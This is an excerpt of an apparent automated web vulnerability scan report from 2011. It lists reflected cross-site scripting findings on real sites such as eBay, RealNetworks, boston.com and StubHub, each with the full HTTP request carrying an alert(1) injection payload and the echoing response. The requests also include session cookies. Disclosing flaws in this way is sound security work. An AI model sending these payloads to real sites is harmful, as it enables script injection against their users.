XvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:07 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=4472778436510522482&fpid=4&nu=n&t=&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.115. http://rd.rlcdn.com/rd [var parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/rd

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8523f%3balert(1)//7a5f5e8a821 was submitted in the var parameter. This input was echoed as 8523f;alert(1)//7a5f5e8a821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rd?site=42664&type=js&var=s_1_Integrate_Rapleaf_get_08523f%3balert(1)//7a5f5e8a821&rnd=6123389569118 HTTP/1.1
Host: rd.rlcdn.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:02:48 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Cache-Control: no-cache, no-store
Content-Length: 63

var s_1_Integrate_Rapleaf_get_08523f;alert(1)//7a5f5e8a821={};

4.116. http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 2a8d7<script>alert(1)</script>0ec91912e3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:46 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:46 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 */
/* path:
/* ############################################################# */

4.117. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 9f3a8<script>alert(1)</script>a29b388671c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:47 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:47 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c
//path:
//################################################################

4.118. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 941d1%0aalert(1)//da580d2ce44 was submitted in the id parameter. This input was echoed as 941d1
alert(1)//da580d2ce44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /workarea/java/ektronJs.ashx?id=EktronSmartMenuJS+EktronWebToolBarJS+EktronFlexMenuJS941d1%0aalert(1)//da580d2ce44 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/pressroom/index.aspx
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:12:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:12:26 GMT
Last-Modified: Tue, 19 Jul 2011 20:12:26 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 55177

function ekMenuEx_classNames(){}ekMenuEx_classNames.button="ekmenu_button";ekMenuEx_classNames.buttonHover="ekmenu_button_hover";ekMenuEx_classNames.buttonSelected="ekmenu_button_selected";ekMenuEx_cl
...[SNIP]...
n().ready(function(){Ektron.EditorsMenu.bindEvents()})};

//################################################################
//ektron registered javascript: js file not found
//id: EktronFlexMenuJS941d1
alert(1)//da580d2ce44
//path:
//################################################################

4.119. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://realnetworksrealarca.tt.omtrdc.net
Path:	/m2/realnetworksrealarca/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8b543<script>alert(1)</script>de66053e04b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global8b543<script>alert(1)</script>de66053e04b&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:26:37 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 131
Date: Tue, 19 Jul 2011 20:26:37 GMT
Server: Test & Target

mboxFactories.get('default').get('gh-global8b543<script>alert(1)</script>de66053e04b',0).setOffer(new mboxOfferDefault()).loaded();

4.120. http://rover.ebay.com/idmap/0 [footer&cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8638b%3balert(1)//c4974089122 was submitted in the footer&cb parameter. This input was echoed as 8638b;alert(1)//c4974089122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback18638b%3balert(1)//c4974089122&_vrdm=1311100564001 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.d63ed1c-13143afa25f
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Tue, 19 Jul 2011 18:36:49 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback18638b;alert(1)//c4974089122(["","",86400]);}catch(e){}

4.121. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 94f58%0a05b7ac25fb8 was submitted in the site parameter. This input was echoed as 94f58
05b7ac25fb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=2166117494f58%0a05b7ac25fb8&d_id=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCDCRCQR=MKNALKKDOIHBFKFFJGNMAODJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2166117494f58
05b7ac25fb8
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

4.122. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload c1850<script>alert(1)</script>7319e07e022 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 879
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:54 GMT

RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a59fd6e1b552"},"Section":null,"Categori
...[SNIP]...

4.123. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stubhub.tt.omtrdc.net
Path:	/m2/stubhub/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 17d1a<script>alert(1)</script>f9a0e7c0a1a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a&mboxId=0&mboxTime=1311082548475&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253B